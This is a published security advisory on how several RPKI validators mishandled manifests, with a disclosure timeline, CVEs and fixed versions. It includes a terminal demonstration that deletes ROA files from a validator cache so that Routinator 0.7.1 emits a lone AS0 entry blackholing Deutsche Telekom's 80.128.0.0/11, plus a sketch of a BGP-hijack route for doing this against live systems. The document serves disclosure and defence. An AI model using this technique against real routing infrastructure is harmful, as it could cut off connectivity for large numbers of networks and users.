Technical Security Advisory on RPKI Manifest Handling
=====================================================

Start Date:	February 26th, 2020
Last update:	October 30th, 2020
Contact:	Job Snijders <job@sobornost.net>

Vulnerable:	OctoRPKI up to 1.1.4
		RIPE NCC Validator up to 3.1
		Routinator up to 0.7.1
		FORT up to 1.2.0
		rpki-client 6.6

Not vulnerable: rpki-client 6.7		(March 2020)
		FORT 1.2.1		(April 2020)
		Routinator 0.8.0	(October 2020)
		RIPE NCC Validator 3.2	(October 2020)
		OctoRPKI 1.2.0		(October 2020)

Summary
=======

When it comes to cryptographic validation it is important for the RPKI / X.509
validator software to confirm whether whether all RPKI certificates and files
are current (not expired), valid (not malformed), and complete (integrity).
If to-be-validated RPKI information is expired and/or incomplete, it should
not be used in BGP routing decision making. 

Network Operators generally expect RPKI to be secure by default. This places a
burden on RPKI software developers. Generally speaking, fixing security issues
of this magnitude should not take this long.

Background
==========

A RPKI Manifest makes it possible for validation software to react
sanely to RPKI data tampering. RPKI Manifests exist to *protect* both the
issuing Certificate Authority (CA) and the Relying Party (RP). Manifests
and strict X.509 handling are the *only* mechanism to verify a publication
point's completeness and integrity. Neither NLnet Labs, RIPE NCC's or
Cloudflare's software attached any consequence to integrity issues at a RPKI
publication point. All continued to emit as many VRPs as possible, regardless
of whether the publication point is complete to begin with!

The datastructure of Route Origin Authorizations (ROAs) allows only a
single origin ASN per .roa file, this means network operators who wish
to grant permission to multiple ASNs (a common example: their own and
their customers' ASNs) to originate parts of their IP space, they *have*
the create multiple .roa files. The IP Block owner's routing intentions
can only be considered when the full bundle of .roa files is available.

Logically, when some .roa files are missing (which according to a valid
current manifest must be present), the remaining .roa files at the
publication point become useless as they represent an *incomplete*
overview of routing intentions; even worse those files flip from
'useless' to 'dangerous' when they are injected as VRPs into the
operator's routing system.

Below is copy+pasted from a terminal transcript to demonstrate an
example attack. The attack scenario is greatly simplified to focus
purely on the manifest handling issue. The attack can be executed by
Monkeys-In-The-Middle. The lines prefixed with ### are my comments, the
lines without are copy+pasted from a terminal.

The manifest handling issue as of the moment of writing works against
versions of RIPE NCC's validator prior to 3.2, Cloudflare's OctoRPKI 1.1.X,
and NLNetlab's Routinator up until 0.7.1.  Current versions of OpenBSD
rpki-client and the FORT validator are not susceptible to this issue.

The objective here is for RPKI Relying Parties to *not* introduce
additional security issues in the global routing system by by deploying
RPKI ROV, as that would undo years of work from all of us. :-)

Timeline:

    26-feb-2020 - NLNetlabs/RIPE NCC/Cloudflare/FORT/world informed via SIDROPS discussions
                  https://mailarchive.ietf.org/arch/msg/sidrops/j_ROy0fyYtHXaKmB6BRwJ6eFl1k/
    23-mar-2020 - opened issue with FORT for tracking
		  https://github.com/NICMx/FORT-validator/issues/28
    23-mar-2020 - opened issue with Cloudflare for tracking
                  https://github.com/cloudflare/cfrpki/issues/38
    28-mar-2020 - github issue opened with NLNetlabs for tracking
                  https://github.com/NLnetLabs/routinator/issues/319
    30-mar-2020 - github issue opened with RIPE NCC for tracking
                  https://github.com/RIPE-NCC/rpki-validator-3/issues/162 (now closed)
                  reopened as https://github.com/RIPE-NCC/rpki-validator-3/issues/232
    07-jul-2020 - RIPE NCC has developed a fix, but it is not enabled by default, leaving
                  users vulnerable to the missing file attack.
                  https://github.com/RIPE-NCC/rpki-validator-3/issues/232
    30-jul-2020 - CVE-2020-16164 was published (curiously logged as 'Disputed')
                  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16164
    --> elapsed time > 6 months --> 
    05-aug-2020 - CVE-2020-17366 was published
                  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17366
    27-aug-2020 - NLNetLabs started work on a fix
                  https://github.com/NLnetLabs/routinator/pull/371
    19-oct-2020 - NLNetLabs releases Routinator 0.8.0 which addresses CVE-2020-17366
                  https://nlnetlabs.nl/projects/rpki/security-advisories/
    29-oct-2020 - RIPE NCC releases version 3.2 which addresses CVE-2020-16164
    29-oct-2020 - Cloudflare releases OctoRPKI 1.2.0 (which fixes the observed issue)

Can RPKI ROAs easily be deleted / hidden from view?
---------------------------------------------------

Yes, a Malicious-In-The-Middle can hide ROAs, neither RSYNC or RRDP have authentication
built-in. It is also possible for a CA operator to make a mistake. For example on April
1st, 2020 the RIPE NCC inadvertently deleted ~ 2,600 ROAs:

	https://labs.ripe.net/Members/nathalie_nathalie/lessons-learned-on-improving-rpki

Demonstration
-------------------------------------------------------

### today's date

job@bench ~$ date
Wed Sep 30 17:05:40 UTC 2020

job@bench ~$ mkdir manifest-demo && cd manifest-demo

### download vulnerable release:

job@bench manifest-demo$ ftp https://github.com/NLnetLabs/routinator/archive/v0.7.1.tar.gz
Trying 140.82.121.3...
Requesting https://github.com/NLnetLabs/routinator/archive/v0.7.1.tar.gz
Redirected to https://codeload.github.com/NLnetLabs/routinator/tar.gz/v0.7.1
Trying 140.82.121.10...
Requesting https://codeload.github.com/NLnetLabs/routinator/tar.gz/v0.7.1
117082 bytes received in 0.11 seconds (1018.36 KB/s)

### unpack 

job@bench manifest-demo$ tar fxz v0.7.1.tar.gz

### go into routinator source code dir & build routinator

job@bench manifest-demo$ cd routinator-0.7.1/
job@bench routinator-0.7.1$ cargo build
  Downloaded remove_dir_all v0.5.2
  Downloaded hyper-rustls v0.20.0
  Downloaded signal-hook-registry v1.2
  ... snip ...

### make data repository directory & tal dir

job@bench routinator-0.7.1$ mkdir ../repository ../tals

### for this demo we only use the RIPE TAL, copy it to location

job@bench routinator-0.7.1$ cp /etc/rpki/ripe.tal ../tals/

### run routinator and force use of rsync for demonstration simplicity sake
### this attack also works via RRDP (as RRDP conceptually is the same as rsync, 
### and has similar weaknesses as rsync, but is transported via HTTPS)
###
### the following is the EXPECTED outcome, in this example I use 
### Deutsche Telekom prefixes, as those are an easy victim target

job@bench routinator-0.7.1$ ./target/debug/routinator --disable-rrdp -b ../ vrps --format csv | grepcidr 80.128.0.0/11
rsync://rpki.admin.freerangecloud.com/repo: failed with status exit code: 35
rsync://rpki.admin.freerangecloud.com/repo: rsync error: timeout waiting for daemon connection (code 35) at socket.c(278) [Receiver=3.2.3]
rsync://rpkica.mckay.com/rpki/MCnet/Jp4Tjp_GB5I1RfeaOGhKZNlDmAQ.mft: stale manifest
rsync://rpkica.mckay.com/rpki/MCnet/Jp4Tjp_GB5I1RfeaOGhKZNlDmAQ.crl: stale CRL.
AS3320,80.156.0.0/16,16,ripe
AS6878,80.158.31.0/24,24,ripe
AS0,80.128.0.0/11,11,ripe
AS3320,80.157.0.0/16,16,ripe
AS3320,80.157.8.0/21,21,ripe
AS6878,80.158.72.0/21,24,ripe
AS6878,80.158.96.0/19,24,ripe
AS3320,80.128.0.0/11,11,ripe
AS6878,80.158.32.0/19,24,ripe
AS3320,80.157.16.0/20,20,ripe
AS3320,80.152.0.0/14,14,ripe
AS34086,80.158.0.0/17,24,ripe
AS3320,80.128.0.0/12,12,ripe
AS6878,80.158.0.0/23,23,ripe
AS6878,80.158.0.0/21,24,ripe
AS6878,80.158.16.0/20,24,ripe
AS3320,80.144.0.0/13,13,ripe
AS6878,80.158.80.0/20,24,ripe
AS2792,80.159.224.0/19,24,ripe

### let's inspect what the manifest tells us to expect in in the directory where the CA is stored

job@bench $ /usr/src/regress/usr.sbin/rpki-client/test-mft -v 1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft
Subject key identifier: 1F:2A:79:C9:90:36:EA:61:F5:81:8A:C3:6E:71:39:D2:C0:61:D4:78
Authority key identifier: FA:D7:10:0E:77:ED:91:19:D6:6E:23:21:BB:67:11:D7:E7:60:98:2B
    1: 1-tcQDnftkRnWbiMhu2cR1-dgmCs.crl
        hash XilzzatUxOVfY5O4x9j+xfmWrBZMgTWMlkgYL9MBru4=
    2: IM3xMiMU1QChuWMOGgnbDwYolrU.roa
        hash RK6exg3NDk8p1toCRGSDay+Wsd6Swz3VuBVIoxGQrl8=
    3: KoSqIaefMEsPiFenDxTKDny_uOk.roa
        hash ZJ1TcqgEeKMva1etur+2quN4EnVAkMLhRmX3y29+omk=
    4: LkKeUPYrfgzjsOIejLjsHGk44cU.roa
        hash V8mgfSbK9K0mtwys1xgGtWxuHWrZ0bZhDTFnBZ+xYVE=
    5: NpI_Uj3OZb6jvwfUTX0-eOk9QV4.roa
        hash E1cPbtWB76l7Wnog2wdVQFNrud/387HdZPmq2cqOyzk=
    6: fIeCcC8KpdJQd-olU2APdxNZkyA.roa
        hash Y31uvYhDrPuXNaEAe02iUa5rEGRmRrgTs7vzTQ/TA+0=
    7: r5vtD4isKhTzGXNGulSnZ7XCS04.roa
        hash NeF/YRK86bfYc19JGghWT54o/Q94FW6mbmpv/d55+uM=
    8: r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa
        hash nPtvIkHqTaohIwFDpvWgUA+LlKy2wKQ27aK18Bv75lo=

### as seen above there are multiple .roa files expected to exist, for each .roa file
### a hash is provided so one can cryptographically verify that the file at hand
### is the file that the CA intended to published via RRDP or RSYNC.

### ATTACK STARTS
###
### now we simulate the monkey-in-the-middle attack
### I could either set up an in-the-middle rsync server, or tinker with the RRDP transport
### instead, we skip that step and just remove the victim ROAs from the cache
###
### the DTAG CA is stored in ../repository/rsync/rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/*.{crl,mft,roa}
### as each .roa file can only contain 1 Origin ASN, but multiple prefixes, as attacker we'll hide
### all .roa files from the view of the validator except the one that lists AS 0 as the origin for 80.128.0.0/11
### let's show the ROA we want to misuse

job@bench $ test-roa -v ../repository/rsync/rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa
Subject key identifier:
AF:B4:D2:C9:69:FF:19:B6:0F:8C:D5:AF:B7:8A:F9:7B:04:8D:02:C9
Authority key identifier:
FA:D7:10:0E:77:ED:91:19:D6:6E:23:21:BB:67:11:D7:E7:60:98:2B
asID: 0
    1: 80.128.0.0/11 (max: 11)
OK

### We remove all but r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa from the validator's view.
### Again - this is trivial to do on the internet as MITM

job@bench routinator-0.7.1$ rsync -r --delete -v \
	--exclude=*.crl --exclude=*.mft --exclude=r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa \
	/var/empty/ \
	../repository/rsync/rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/
sending incremental file list
deleting r5vtD4isKhTzGXNGulSnZ7XCS04.roa
deleting fIeCcC8KpdJQd-olU2APdxNZkyA.roa
deleting NpI_Uj3OZb6jvwfUTX0-eOk9QV4.roa
deleting LkKeUPYrfgzjsOIejLjsHGk44cU.roa
deleting KoSqIaefMEsPiFenDxTKDny_uOk.roa
deleting IM3xMiMU1QChuWMOGgnbDwYolrU.roa

### now we run the validation process again, but this time with the '-n' option
### to force the validator to use the (manipulated) local cache
###
### as can be observed, a single VRP is emitted with AS 0

job@bench routinator-0.7.1$ ./target/debug/routinator --disable-rrdp  -b ../ vrps -n --format csv | grepcidr 80.128.0.0/11
rsync://rpkica.mckay.com/rpki/MCnet/Jp4Tjp_GB5I1RfeaOGhKZNlDmAQ.mft: stale manifest
rsync://rpkica.mckay.com/rpki/MCnet/Jp4Tjp_GB5I1RfeaOGhKZNlDmAQ.crl: stale CRL.
AS0,80.128.0.0/11,11,ripe

### the above SINGLE vrp will cause a network with 'invalid is reject' EBGP policies to
### REJECT all BGP routes matching or more-specific to 80.128.0.0/11
### at that point half of Germany is unreachable as 80.128.0.0/11 contains
### 2,097,150 IPv4 addresses which represents a lot of businesses & households

### in contrast, rpki-client operating on the same manipulated will *NOT*
### emit any VRPs, as OpenBSD rpki-client recognises via the manifest that some 
### (important) files are missing
### just like in the previous example with routinator, we run rpki-client with '-n'
### so it uses the *exact same* RPKI input data as routinator did

job@bench $ rpki-client -d /home/job/manifest-demo/repository/rsync -n -t ../tals/ripe.tal -c -v ../
rpki-client: rpki.ripe.net/ta: using cache
rpki-client: rpki.ripe.net/repository: using cache
rpki-client: nostromo.heficed.net/repo: using cache
rpki-client: rsync.rpki.nlnetlabs.nl/repo: using cache
rpki-client: rpki.admin.freerangecloud.com/repo: using cache
rpki-client: rpkica.mckay.com/rpki: using cache
rpki-client: rsync.rpki.a2b-internet.com/repo: using cache
rpki-client: rpki.xindi.eu/repo: using cache
rpki-client: ca.rg.net/rpki: using cache
rpki-client: rpki.qs.nu/repo: using cache
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file IM3xMiMU1QChuWMOGgnbDwYolrU.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file KoSqIaefMEsPiFenDxTKDny_uOk.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file LkKeUPYrfgzjsOIejLjsHGk44cU.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file NpI_Uj3OZb6jvwfUTX0-eOk9QV4.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file fIeCcC8KpdJQd-olU2APdxNZkyA.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file r5vtD4isKhTzGXNGulSnZ7XCS04.roa: No such file or directory
rpki-client: rpki.admin.freerangecloud.com/repo/FRC-CA/1/DC9B0FC0FAE1CB3BD28B9D01AAFC3563FDA951DA.mft: No such file or directory
rpki-client: rpkica.mckay.com/rpki/MCnet/UEh2SAvdIgPsUFdv92RSSaNqBnY.mft: No such file or directory
rpki-client: cc.rg.net/rpki: using cache
rpki-client: cb.rg.net/rpki: using cache
rpki-client: all files parsed: generating output
rpki-client: Route Origin Authorizations: 18582 (0 failed parse, 0 invalid)
rpki-client: Certificates: 12813 (0 failed parse, 0 invalid)
rpki-client: Trust Anchor Locators: 1
rpki-client: Manifests: 12813 (3 failed parse, 0 stale)
rpki-client: Certificate revocation lists: 12810
rpki-client: Repositories: 12
rpki-client: Files removed: 373
rpki-client: VRP Entries: 98353 (98353 unique)

### in the above output one can see that the client emitted errors about missing files
### routinator did *not* emit any errors or warnings that .roa files were missing

### if we inspect the rpki-client output for any VRPs contained within 80.128.0.0/11
### the output is EMPTY, this means that *NO VRPs* related to 80.128.0.0/11 were
### injected into the BGP system

job@bench $ grepcidr 80.128.0.0/11 ../csv
job@bench $

### No VRP related to the busted publication point, is safer than an incomplete set of VRPs!

### DEMO PARAMETERS
### In the real world one has to do some work to set up the monkey-in-the-middle
### attack. An attacker could combine an Kapela-Pilosov BGP attack and either
### pretend to be an rsync server or obtain a WebPKI TLS certificate for
### rpki.ripe.net via a shady TLS root (like diginotar). The attacked doing MITM
### could block port 443 to force a downgrade to rsync.
### rpki.ripe.net is not well-peered, so spoofing the origin and 'winning' the
### traffic via an Kapela-Pilosov is not all too hard.
### THIS ATTACK IS TRIVIAL
###
### CONCLUSION
###
### routinator 0.7.1 will emit VRPs based on incomplete data, in some scenarios
### this can lead to loss of connectivity towards (important) destinations,
### because BGP routes are flipped from VALID ... to INVALID the router only
### sees the VRPs resulting from the only .roa file that the attacker wishes for
### the victim to see.
###
### In contrast, routinator 0.8.0, rpki-client or FORT will *not* emit VRPs iff files
### that according to the manifest must exist, don't exist. This causes BGP routes to
### flip from VALID to NOT-FOUND, which is a safer. Any problem in RPKI data MUST
### result in 'not-found', not in 'invalid'.
###
###
### UPGRADE YOUR VALIDATOR